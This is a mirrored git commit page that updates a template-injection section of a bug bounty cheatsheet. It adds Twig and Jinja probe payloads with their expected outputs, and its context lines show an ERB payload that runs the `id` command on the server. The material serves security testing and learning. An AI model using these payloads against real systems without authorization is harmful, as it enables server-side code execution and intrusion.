mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2024-11-25 04:20:19 +00:00
Update template-injection.md
This commit is contained in:
parent
35a668facf
commit
9eef83ab7d
1 changed files with 17 additions and 1 deletions
|
@ -5,3 +5,19 @@
|
||||||
```ruby
|
```ruby
|
||||||
<%=`id`%>
|
<%=`id`%>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
**Twig**
|
||||||
|
|
||||||
|
The following payload should output `49`.
|
||||||
|
|
||||||
|
```
|
||||||
|
{{7*'7'}}
|
||||||
|
```
|
||||||
|
|
||||||
|
**Jinja**
|
||||||
|
|
||||||
|
This payload should output `7777777`.
|
||||||
|
|
||||||
|
```
|
||||||
|
{{7*'7'}}
|
||||||
|
```
|
||||||
|
|
Loading…
Reference in a new issue